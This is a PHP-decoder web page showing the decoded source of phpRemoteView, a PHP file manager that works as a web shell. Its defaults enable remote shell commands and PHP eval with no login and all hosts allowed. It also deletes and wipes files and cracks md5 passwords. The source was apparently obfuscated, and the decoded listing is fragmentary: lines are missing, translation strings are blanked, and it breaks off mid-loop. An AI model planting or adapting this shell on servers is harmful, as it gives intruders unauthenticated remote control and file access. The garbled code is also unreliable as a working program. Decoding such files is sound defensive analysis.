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PHP Decode

<?php /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ..

Decoded Output download

/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
 *  Welcome to phpRemoteView (RemView) 
 *  View/Edit remove file system: 
 *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions) 
 *  - view name, size, owner:group, perms, modify time of files 
 *  - view html/txt/image/session files 
 *  - download any file and open on Notepad 
 *  - create/edit/delete file/dirs 
 *  - executing any shell commands and any PHP-code 
 *  Free download from 
 *  Version 04c, 2003-10-23. 
 *  Please, report bugs... 
 *  This programm for Unix/Windows system and PHP4 (or higest). 
 *  (c) Dmitry Borodin, [email protected], 
 * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * * 
 * --version4-- 
 *  2003.10.23 support short <?php ?> tags, thanks A.Voropay 
 *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
 *                thanks Anight 
 *             add many functions/converts: md5, decode md5 (pass crack), 
 *                date/time, base64, translit, russian charsets 
 *             fix bug: read session files 
 *  2002.08.24 new design and images 
 *             many colums in panel 
 *             sort & setup panel 
 *             dir tree 
 *             base64 encoding 
 *             character map 
 *             HTTP authentication with login/pass 
 *             IP-address authentication with allow hosts 
 * --version3-- 
 *  2002.08.10 add multi language support (english and russian) 
 *             some update 
 *  2002.08.05 new: full windows support 
 *             fix some bugs, thanks Jeremy Flinston 
 *  2002.07.31 add file upload for create files 
 *             add 'direcrory commands' 
 *             view full info after safe_mode errors 
 *             fixed problem with register_glogals=off in php.ini 
 *             fixed problem with magic quotes in php.ini (auto strip slashes) 
 * --version2-- 
 *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands 
 *             add panel 'TOOLS': eval php-code and run shell commands 
 *             add copy/edit/create file (+panel 'EDIT') 
 *             add only-read mode (disable write/delete and PHP/Shell) 
 *  2002.01.19 add delete/touch/clean/wipe file 
 *             add panel 'INFO', view a/c/m-time, hexdump view 
 *             add session file view mode (link 'SESSION'). 
 *  2002.01.12 first version! 
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ 
///////////////////////////////// S E T U P /////////////////////////////////// 
   $hexdump_lines=8;        // lines in hex preview file 
   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line 
   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button) 
   $maxsize_fread=65536;    // read first 64Kb from any null-size file 
   // USER ACCESS // 
   $write_access=true;      // true - user (you) may be write/delete files/dirs 
                            // false - only read access 
   $phpeval_access=true;    // true - user (you) may be execute any php-code 
                            // false - function eval() disable 
   $system_access=true;     // true - user (you) may be run shell commands 
                            // false - function system() disable 
   $login=false;            // Login & password for access to this programm. 
   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd"; 
                            // Type 'login=false' for disable authorization. 
   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied. 
                            // Example: $host_allow=array("127.0.0.*","localhost") 
   foreach ($host_allow as $k=>$v) 
   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
      exit("<h1><a href=>phpRemoteView</a>: Access Denied - your host not allow</h1>
   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) { 
      header("WWW-Authenticate: Basic realm=\"phpRemoteView\""); 
      header("HTTP/1.0 401 Unauthorized"); 
      exit("<h1><a href=>phpRemoteView</a>: Access Denied - password erroneous</h1>
   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler"); 
        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : ""). 
        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : ""); 
   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars; 
   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ". 
              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ". 
              "fatt showfile showsize root name ref names sort sortby ". 
              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty"; 
   foreach (explode(" ",$autovars1) as $k=>$v)  { 
      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v]; 
         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v]; 
            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v]; 
   // autofix 'magic quotes': 
   $autovars2="php shell text d root convert"; 
   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) { 
      foreach (explode(" ",$autovars2) as $k=>$v) { 
         if (isset($$v)) $$v=stripslashes($$v); 
      "d/m/y H:i", 
   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
$cc / $cp[0]-   ,   $cs: 
   $cc[0] -    ,     : 
               n -   
               e -  
   $cc[1] -  (0 - . 1 - ) 
   $cc[2] -    
   $cc[3] -       : 
               0 -   text/plain 
               1 -   html 
               2 - download 
               3 -   (info) 
   $cc[4] -     // 
   $cc[5] - : 
               1 -  
               2 -  
$cn / $cp[1] -     ,  ,  /: 
   t - type 
   n - name 
   s - size 
   a - owner+group 
   o - owner 
   g - group 
   c - chmod 
   1 - create time 
   2 - modify time 
   3 - access time 
"Index of"=>"", 
"View file"=>" ", 
"Sorry, this programm run in read-only mode."=>",      ' '.", 
"For full access: write"=>"  : ", 
"in this php-file"=>"  php-", 
"Error path"=>" ", 
"Click here for start"=>"  ", 
"up directory"=>" ", 
"access denied"=>" ", 
"Free download"=>" ", 
"back to directory"=>"  ", 
"FileType"=>" ", 
"Create time"=>" ", 
"Access time"=>" ", 
"MODIFY time"=>" ", 
"HEXDUMP PREVIEW"=>"  16- ", 
"Can't READ file - access denied"=>"   -  ", 
"full read/write access"=>"   /", 
"Delete this file"=>" ", 
"Set current 'mtime'"=>"..", 
"Write '0000..' and delete"=>" , ", 
"COPY FILE"=>" ", 
"MAKE DIR"=>" ", 
"type full path"=>"  ", 
"CREATE NEW FILE or override old file"=>"     ", 
"select file on your local computer"=>"     ", 
"save this file on path"=>"    ", 
"create file name automatic"=>"   ", 
"type any file name"=>"   ", 
"convert file name to lovercase"=>"    ", 
"Send File"=>" ", 
"Delete all files in dir"=>"  ", 
"Delete all dir/files recursive"=>"  + ", 
"Confirm not found (go back and set checkbox)"=>"   (    )", 
"Delete cancel - File not found"=>"  -   ", 
"NO (back)"=>" ()", 
"Delete cancel"=>" ", 
"done (go back)"=>" ()", 
"Delete ok"=>", ", 
"Touch cancel"=>" ", 
"Touch ok (set current time to 'modify time')"=>"  (    )", 
"Clean (empty file) cancel"=>" ( ) ", 
"Clean ok (file now empty)"=>",  ( )", 
"Wipe cancel - access denied"=>"  -  ", 
"Wipe ok (file deleted)"=>",  (  )", 
"Deleting all files in"=>"   ", 
"Deleting all dir/files (recursive) in"=>"  / ()", 
"DONE, go back"=>", ", 
"file not found"=>"  ", 
"ONLY READ ACCESS (don't edit!)"=>"    ( )", 
"Can't READ file - access denied (don't edit!)"=>"    -  ", 
"EDIT FILE"=>" ", 
"can't open, access denied"=>"  ,  ", 
"SAVE FILE (write to disk)"=>"  (  )", 
"You mast checked 'create file name automatic' OR typed file name!"=>"    [  ]      !'", 
"SAVING TO"=>" ", 
"Sorry, access denied"=>",  ", 
"for example, uncomment next line"=>" ,   ", 
"Eval PHP code"=>" PHP ", 
"don't type"=>" ", 
"example (remove comments '#')"=>" (  '#')", 
"Shell commands"=>" Shell'a", 
"filesize to 0byte"=>"  0 ", 
"Full file name"=>"  ", 
"Can't open directory"=>"   ", 
"Reset all settings"=>"  ", 
"Colums and sort"=>"  ", 
"Sort order"=>" ", 
"Ascending sort"=>" ", 
"Descending sort"=>" ", 
"Sort by filename"=>"   ", 
"Sort by filename extension"=>"   ", 
"Date/time format"=>" /", 
"Panel font & size"=>"/ ", 
"Char map"=>"", 
"Character map (symbol codes table)"=>" ", 
"Select font"=>" ", 
"or type other"=>"  ", 
"Font size"=>" ", 
"Code limit"=>" ", 
"Generate table"=>" ", 
"Universal convert"=>" " 
   if ($language!=1 && $language!=2) $language=1; 
function mm($m) { 
   global $mm,$language; 
   if ($language==1) return $m; 
   if (isset($mm[$m])) return $mm[$m]; 
   else echo "<script>alert('(mm) msg not found: $m');</script>"; 
switch ($language) { 
case 1: 
case 2: 
   if (!isset($c)) $c=""; 
   if (!isset($d)) $d=""; 
   if (!isset($f)) $f=""; 
   if ($d=="") $d=realpath("./")."/"; 
   if ($c=="") $c="l"; 
   if ($d[strlen($d)-1]!="/") $d.="/"; 
   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb"); 
   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb"); 
   // OS detect: 
   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1; 
<title>phpRemoteView: $d$f</title> 
A { 
text-decoration : none; 
.t { 
font-size: 9pt; 
text-align : center; 
font-family: Verdana; 
.t2 { 
font-size: 8pt; 
text-align : center; 
font-family: Verdana; 
.n { 
  font-family: Fixedsys 
.s { 
font-size: 10pt; 
text-align : right; 
font-family: Verdana; 
.sy { 
font-family: Fixedsys; 
.s2 { 
font-family: Fixedsys; 
color: red; 
.tab { 
font-size: 10pt; 
text-align : center; 
font-family: Verdana; 
background: #cccccc; 
.tr { 
background: #ffffff; 
function display_perms($mode) 
if ($GLOBALS['win']) return 0; 
/* Determine Type */ 
if( $mode & 0x1000 ) 
$type='p'; /* FIFO pipe */ 
else if( $mode & 0x2000 ) 
$type='c'; /* Character special */ 
else if( $mode & 0x4000 ) 
$type='d'; /* Directory */ 
else if( $mode & 0x6000 ) 
$type='b'; /* Block special */ 
else if( $mode & 0x8000 ) 
$type='-'; /* Regular */ 
else if( $mode & 0xA000 ) 
$type='l'; /* Symbolic Link */ 
else if( $mode & 0xC000 ) 
$type='s'; /* Socket */ 
$type='u'; /* UNKNOWN */ 
/* Determine permissions */ 
$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
$group["read"] = ($mode & 00040) ? 'r' : '-'; 
$group["write"] = ($mode & 00020) ? 'w' : '-'; 
$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
$world["read"] = ($mode & 00004) ? 'r' : '-'; 
$world["write"] = ($mode & 00002) ? 'w' : '-'; 
$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
/* Adjust for SUID, SGID and sticky bit */ 
if( $mode & 0x800 ) 
$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
if( $mode & 0x400 ) 
$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
if( $mode & 0x200 ) 
$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
$s=sprintf("%1s", $type); 
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
return trim($s); 
function _posix_getpwuid($x) { 
   if ($GLOBALS['win']) return array(); 
   return @posix_getpwuid($x); 
function _posix_getgrgid($x) { 
   if ($GLOBALS['win']) return array(); 
   return @posix_getgrgid($x); 
function up($d,$f="",$name="") { 
   global $self,$win; 
   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; } 
   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";} 
   else {$sf1="<font size=2>"; $sf2="<font size=3>";} 
   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
   bgcolor=#cccccc> $sf1"; 
   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>"; 
   echo $home.$sf2."<b>"; 
   if ($name!="") echo $name; 
   else { 
      if ($f=="") echo mm("Index of"); 
      else echo mm("View file"); 
   echo "</b></font> "; 
   if ($win) $rootdir=strtoupper(substr($d,0,2))."/"; 
   for ($i=0; $i<count($path)-1; $i++) { 
      if ($i==0) 
      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>"; 
      if ($i==0 && $d=="/") break; 
   echo "</font>"; 
   if ($f!="") echo "$sf1$f</font>"; 
   if ($win && strlen($d)<4 && $f=="") { 
      echo " &nbsp; ".mm("DISK").": "; 
      for ($i=ord('a'); $i<=ord('z'); $i++) { 
         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> "; 
   echo "</b></big></td><td bgcolor=#999999 width=1% align=center> 
   <table width=100% border=0 cellspacing=3 cellpadding=0 
   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b> 
function up_link($d,$f) { 
   global $self; 
echo "<small> 
[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>] 
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>] 
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>] 
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>] 
[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>] 
[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>] 
[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>] 
[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>] 
function exitw() { 
exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd> 
<tr><td align=center> 
".mm("Sorry, this programm run in read-only mode.")."<br> 
".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
".mm("in this php-file").".</td></tr></table> 
function ob() { 
   global $obb_flag, $obb; 
   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; } 
   if (function_exists("ob_start")) { 
      if ($GLOBALS['obb_flag']) ob_end_clean(); 
function obb() { 
   global $obb; 
   if (function_exists("ob_start")) { 
<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td> 
<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center> 
<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td> 
function sizeparse($size) { 
   return strrev(preg_replace("!...!","\0 ",strrev($size))); 
function jsval($msg) { 
   return '"'.$msg.'",'; 
switch($c) { 
// listing 
case "l": 
   echo $GLOBALS['html']; 
   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>."); 
   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")). 
      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>". 
      "<font color=red><b>".mm("access denied")."</b></font>: $obb"); 
   while (false!==($name=$di->read())) { 
      if ($name=="." || $name=="..") continue; 
      if (@is_dir($d.$name)) { 
      else { 
      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; } 
      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
   if (count($dirs)) 
   foreach ($dirs as $v) { 
       switch ($cc[0]) { 
          case "e": $listsort[$v]=$fext[$v].' '.$v; break; 
          case "n": $listsort[$v]=strtolower($v); break; 
             switch ($cn[$cc[0]]) { 
                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break; 
                case "o": $listsort[$v]=$fowner[$v]; break; 
                case "g": $listsort[$v]=$fgroup[$v]; break; 
                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break; 
                case "c": $listsort[$v]=$fperms[$v]; break; 
                case "1": $listsort[$v]=$fctime[$v]; break; 
                case "2": $listsort[$v]=$fmtime[$v]; break; 
                case "3": $listsort[$v]=$fatime[$v]; break; 
   //echo "<pre>";print_r($names); 
   if ($cc[1]) arsort($names); else asort($names); 
   //echo "<pre>";print_r($names); 
   if (count($files)) 
   foreach ($files as $v) { 
       switch ($cc[0]) { 
          case "e": $listsort[$v]=$fext[$v].' '.$v; break; 
          case "n": $listsort[$v]=strtolower($v); break; 
             switch ($cn[$cc[0]]) { 
                case "n": $listsort[$v]=strtolower($v); break; 
                case "t": $listsort[$v]=$ftype[$v]; break; 
                case "s": $listsort[$v]=$fsize[$v]; break; 
                case "o": $listsort[$v]=$fowner[$v]; break; 
                case "g": $listsort[$v]=$fgroup[$v]; break; 
                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break; 
                case "c": $listsort[$v]=$fperms[$v]; break; 
                case "1": $listsort[$v]=$fctime[$v]; break; 
                case "2": $listsort[$v]=$fmtime[$v]; break; 
                case "3": $listsort[$v]=$fatime[$v]; break; 
   //echo "<pre>DIRS:"; print_r($names); 
   if ($cc[1]) arsort($listsort); else asort($listsort); 
   foreach ($listsort as $k=>$v) $names[$k]=$v; 
   //echo "<pre>FILES:"; print_r($listsort); 
   //echo "<pre>NAMES:"; print_r($names); 
.title { 
color: 'black'; 
background: #D4D0C8; 
text-align: 'center'; 
BORDER-RIGHT:   #888888 1px outset; 
BORDER-TOP:     #ffffff 2px outset; 
BORDER-LEFT:    #ffffff 1px outset; 
BORDER-BOTTOM:  #888888 1px outset; 
.window { 
BORDER-RIGHT:  buttonhighlight 2px outset; 
BORDER-TOP:    buttonhighlight 2px outset; 
BORDER-LEFT:   buttonhighlight 2px outset; 
BORDER-BOTTOM: buttonhighlight 2px outset; 
FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; 
CURSOR: default; 
.window1 { 
BORDER-RIGHT:  #eeeeee 1px solid; 
BORDER-TOP:    #808080 1px solid; 
BORDER-LEFT:   #808080 1px solid; 
BORDER-BOTTOM: #eeeeee 1px solid; 
FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; 
.line { 
BORDER-RIGHT:   #cccccc 1px solid; 
BORDER-TOP:     #ffffff 1px solid; 
BORDER-LEFT:    #ffffff 1px solid; 
BORDER-BOTTOM:  #cccccc 1px solid; 
font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>; 
.line2 { 
background: #ffffcc; 
.black {color: black} {color: black} {color: black} {color: black} {color: #0000ff} 
.white {color: white} 
a:link.white{color: white} 
a:active.white{color: white} 
a:visited.white{color: white} 
a:hover.white{color: #ffff77} 
a:link     {color: #000099;} 
a:active   {color: #000099;} 
a:visited  {color: #990099;} 
a:hover    {color: #ff0000;} 
a { 
CURSOR: default; 
.windowtitle { 
font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif; 
font-weight: bold; 
color: white; 
.sym { 
font: 14px Wingdings; 
function up2($d) { 
   global $win,$self; 
   if (substr($d,-1)!="/") $d.="/"; 
   for ($i=0; $i<count($n); $i++) { 
      if ($i==0) $path=strtoupper($path); 
   for ($i=0; $i<count($n); $i++) { 
      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>"; 
      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) { 
         if (strlen($d)-$sum>$gr) { 
         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i]; 
   return $out; 
   return "<font size=-2>$d</font>"; 
   echo "

function tr("; 
   for ($i=0; $i<strlen($cn); $i++) { 
      echo "a$i,"; 
   echo "x) {
document.write(\"<tr bgcolor=#eeeeee"; 
//   echo " onMouseOver='\\"line2\\"' onMouseOut='\\"line\\"'>"; 
   echo " onMouseOver='\\"#FFFFCC\\"' onMouseOut='\\"\\"'>"; 
   for ($i=0; $i<strlen($cn); $i++) { 
      echo '<td align='.$cn_align[$cn[$i]].' class=line '; 
      switch ($cn[$i])  { 
         case 's': case 'c':  case '1':  case '2':  case '3': case 't': 
            echo ' nowrap'; 
      echo ">"; 
      if ($cn[$i]!='t' && $cn[$i]!='n') echo ""; 
      echo "\"+a$i+\""; 
      if ($cn[$i]!='t' && $cn[$i]!='n') echo ""; 
      echo "</td>"; 
   echo "</tr>\");
   echo "


   //echo implode(" | ",$cp); 
   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
      class=window align=center width=60%><form name=main>'; 
   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'. 
   $self.'?c=img&name=fon&r=" class=windowtitle>'; 
         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'. 
         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'. 
   echo '</td></tr>'. 
   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>'; 
   'up'=>"UP DIR", 
   'mode'=>'SETUP, folder option', 
   'edit'=>'DIR INFO', 
   'setup'=>'PHP eval, Shell', 
   function button_url($name) { 
      global $self,$d,$f,$uurl; 
      switch ($name) { 
         case 'up': return "$self?c=l&d=".urlencode(realpath($d."..")); 
         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d); 
         case 'mode': return "$self?c=setup&ref=$uurl"; 
         case 'edit': return "$self?c=d&d=".urlencode($d); 
         case 'home': return ""; 
         case 'papki': return "$self?c=tree&d=".urlencode($d); 
         case 'setup': return "$self?c=t"; 
         case 'back': return "javascript:history.back(-1)"; 
   echo '<td colspan='.strlen($cn).'> 
   <table border=0 cellspacing=0 cellpadding=2><tr>'; 
   for ($i=0; $i<count($buttons); $i++) { 
      if ($buttons[$i]=='full') { 
         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>'; 
      if ($buttons[$i]=='disk') { 
         if (!$win) continue; 
         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="\'#eeee88\'" '. 
              ' onMouseOut="\'\'">'; 
         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 ' 
         for ($j=ord('A'); $j<=ord('Z'); $j++) 
            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j); 
         echo "</select></td>"; 
      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'. 
           ' onMouseMove="\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'. 
           ' onMouseOut="\'\';window.status=\'\'"'. 
           ' onClick=\'location.href="'.$bturl.'"\'><a href='; 
      echo button_url($buttons[$i]); 
      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>'; 
   echo '</tr></table> 
   for ($i=0; $i<strlen($cn); $i++) { 
      echo "<td nowrap class=title onClick='location.href=\"". 
      switch ($cn[$i]) { 
         case 1: case 2: case 3: case "s": echo " width=13%"; break; 
         case 't': echo " width=2%"; break; 
         case 'n': echo " width=40%"; break; 
      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>"; 
      switch ($cn[$i]) { 
         case "n": case "t": case "s": case "o": case "g": 
         case "a": case "c": case "1": case "2": case "3": 
            echo "".$cn_name[$cn[$i]].""; break; 
            echo "??$cn[$i]??"; 
      if ($cc[0]==="$i") { 
         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>"; 
         else echo "<img src=$self?c=img&name=sort_desc border=0>"; 
      echo '</a></td>'; 
   echo '</tr>'; 
   echo "


   foreach ($names as $k=>$v) { 
      echo "

// $k 
      echo 'tr('; 
      for ($i=0; $i<strlen($cn); $i++) { 
         switch ($cn[$i]) { 
            case 'n': 
               switch($ftype[$k]) { 
               case 'file': 
                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp" 
                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1"; 
                  if (substr($k,0,5)=="sess_") $add="&ftype=4"; 
                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d). 
                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>'; 
               if ($ftype[$k]=='dir') 
                  $ln.='<img src='.$self.'?c=img&name=dir border=0>'; 
               else { 
                  foreach ($ext as $kk=>$vv) { 
                     if (in_array(strtolower($fext[$k]),$vv)) { 
                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>'; 
                  if (!$found) 
                     $ln.='<img src='.$self.'?c=img&name=unk border=0>'; 
               echo jsval($ln); 
            case "t": 
               switch ($ftype[$k]) { 
               case "dir": 
                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
               case "file": 
                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=". 
                     urlencode($d)."&f=".urlencode($k)." class=sym></a> ". 
                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym></a>"); 
               case "link": 
                  echo jsval("<font class=t>&#8212;&gt;</font>"); 

Did this file decode correctly?

Original Code


/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 *  Welcome to phpRemoteView (RemView)
 *  View/Edit remove file system:
 *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
 *  - view name, size, owner:group, perms, modify time of files
 *  - view html/txt/image/session files
 *  - download any file and open on Notepad
 *  - create/edit/delete file/dirs
 *  - executing any shell commands and any PHP-code
 *  Free download from
 *  Version 04c, 2003-10-23.
 *  Please, report bugs...
 *  This programm for Unix/Windows system and PHP4 (or higest).
 *  (c) Dmitry Borodin, [email protected],
 * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
 * --version4--
 *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
 *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero),
 *                thanks Anight
 *             add many functions/converts: md5, decode md5 (pass crack),
 *                date/time, base64, translit, russian charsets
 *             fix bug: read session files
 *  2002.08.24 new design and images
 *             many colums in panel
 *             sort & setup panel
 *             dir tree
 *             base64 encoding
 *             character map
 *             HTTP authentication with login/pass
 *             IP-address authentication with allow hosts
 * --version3--
 *  2002.08.10 add multi language support (english and russian)
 *             some update
 *  2002.08.05 new: full windows support
 *             fix some bugs, thanks Jeremy Flinston
 *  2002.07.31 add file upload for create files
 *             add 'direcrory commands'
 *             view full info after safe_mode errors
 *             fixed problem with register_glogals=off in php.ini
 *             fixed problem with magic quotes in php.ini (auto strip slashes)
 * --version2--
 *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
 *             add panel 'TOOLS': eval php-code and run shell commands
 *             add copy/edit/create file (+panel 'EDIT')
 *             add only-read mode (disable write/delete and PHP/Shell)
 *  2002.01.19 add delete/touch/clean/wipe file
 *             add panel 'INFO', view a/c/m-time, hexdump view
 *             add session file view mode (link 'SESSION').
 *  2002.01.12 first version!
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

///////////////////////////////// S E T U P ///////////////////////////////////

   $hexdump_lines=8;        // lines in hex preview file
   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line

   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)

   $maxsize_fread=65536;    // read first 64Kb from any null-size file

   // USER ACCESS //

   $write_access=true;      // true - user (you) may be write/delete files/dirs
                            // false - only read access

   $phpeval_access=true;    // true - user (you) may be execute any php-code
                            // false - function eval() disable

   $system_access=true;     // true - user (you) may be run shell commands
                            // false - function system() disable


   $login=false;            // Login & password for access to this programm.
   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
                            // Type 'login=false' for disable authorization.

   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
                            // Example: $host_allow=array("127.0.0.*","localhost")


   foreach ($host_allow as $k=>$v)
   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR"))))
      exit("<h1><a href=>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) ||
      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
      header("HTTP/1.0 401 Unauthorized");
      exit("<h1><a href=>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");

   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");


        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");

   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
              "fatt showfile showsize root name ref names sort sortby ".
              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
   foreach (explode(" ",$autovars1) as $k=>$v)  {
      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
